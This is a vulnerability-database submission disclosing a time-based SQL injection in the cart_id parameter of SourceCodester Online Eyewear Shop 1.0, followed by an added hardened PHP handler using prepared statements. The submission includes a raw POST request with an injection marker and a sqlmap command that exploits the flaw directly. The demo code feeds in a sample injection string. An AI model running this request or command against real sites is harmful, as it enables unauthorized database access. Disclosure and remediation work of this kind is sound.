| Title | SourceCodester Online Eyewear Shop 1.0 SQL Injection |
|---|
| Description | The application Online Eyewear Shop 1.0 is vulnerable to SQL Injection Time-based attacks.
The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:
- http://localhost/oews/classes/Master.php?f=update_cart
The vulnerable function corresponds to "update_cart" within the following source code file:
- oews/classes/Master.php
The vulnerable parameter "cart_id" is reported inside the following POST request's body:
'''
POST /oews/classes/Master.php?f=update_cart HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Origin: http://localhost
Connection: close
Referer: http://localhost/oews/?p=cart_list
Cookie: PHPSESSID=<customer-session-cookie>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

cart_id=*&qty=7
'''
The above request can be directly employed within the "sqlmap" tool:
$ sqlmap -r req.txt -b --dbms "MySQL" |
|---|
| User | pcontiCP (UID 40374) |
|---|
| Submitted | 2023. 02. 06. PM 04:31 (3 years ago) |
|---|
| Moderation | 2023. 02. 06. PM 07:50 (3 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 220245 [SourceCodester Online Eyewear Shop 1.0 HTTP POST Request Master.php?f=update_cart cart_id SQL injection] |
|---|
| Points | 17 |
|---|
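
A hardened form of an "update_cart" handler for the "cart_id" and "qty" parameters described above, as an added example; it is not code from the submission or from the application. The PDO connection, the `cart_list` table, its column names, the range limits, and the customer id taken from the session are all assumptions made for illustration.

```php
<?php
// Added example, not the application's code. Table and column names are assumed.
declare(strict_types=1);

function update_cart(PDO $db, array $post, int $customerId): array
{
    // Accept only decimal integers in a bounded range; any other input is
    // rejected before it can reach the database layer.
    $opts   = ['options' => ['min_range' => 1, 'max_range' => 1000000]];
    $cartId = filter_var($post['cart_id'] ?? null, FILTER_VALIDATE_INT, $opts);
    $qty    = filter_var($post['qty'] ?? null, FILTER_VALIDATE_INT, $opts);
    if ($cartId === false || $qty === false) {
        return ['status' => 'failed', 'error' => 'invalid cart_id or qty'];
    }

    // Placeholders keep the values out of the SQL text. The customer_id
    // predicate limits the update to rows owned by the logged-in customer.
    $stmt = $db->prepare(
        'UPDATE cart_list SET quantity = :qty WHERE id = :id AND customer_id = :cid'
    );
    $stmt->execute([':qty' => $qty, ':id' => $cartId, ':cid' => $customerId]);

    return ['status' => 'success', 'rows' => $stmt->rowCount()];
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite),
// so the handler can be exercised without the real application or MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cart_list (
    id INTEGER PRIMARY KEY, customer_id INTEGER, quantity INTEGER)');
$db->exec('INSERT INTO cart_list VALUES (1, 10, 1), (2, 11, 1)');

// Customer 10 updating their own cart row.
var_dump(update_cart($db, ['cart_id' => '1', 'qty' => '7'], 10));
// Customer 10 naming a row that belongs to customer 11.
var_dump(update_cart($db, ['cart_id' => '2', 'qty' => '7'], 10));
// Constructed non-integer cart_id: fails validation, no query is executed.
var_dump(update_cart($db, ['cart_id' => '1 OR 1=1', 'qty' => '7'], 10));
// Table contents after the three calls.
var_dump($db->query('SELECT id, quantity FROM cart_list')->fetchAll(PDO::FETCH_NUM));
```

On MySQL, `rowCount()` reports rows actually changed, so an update that sets the quantity to its current value returns 0 rows even though the row matched.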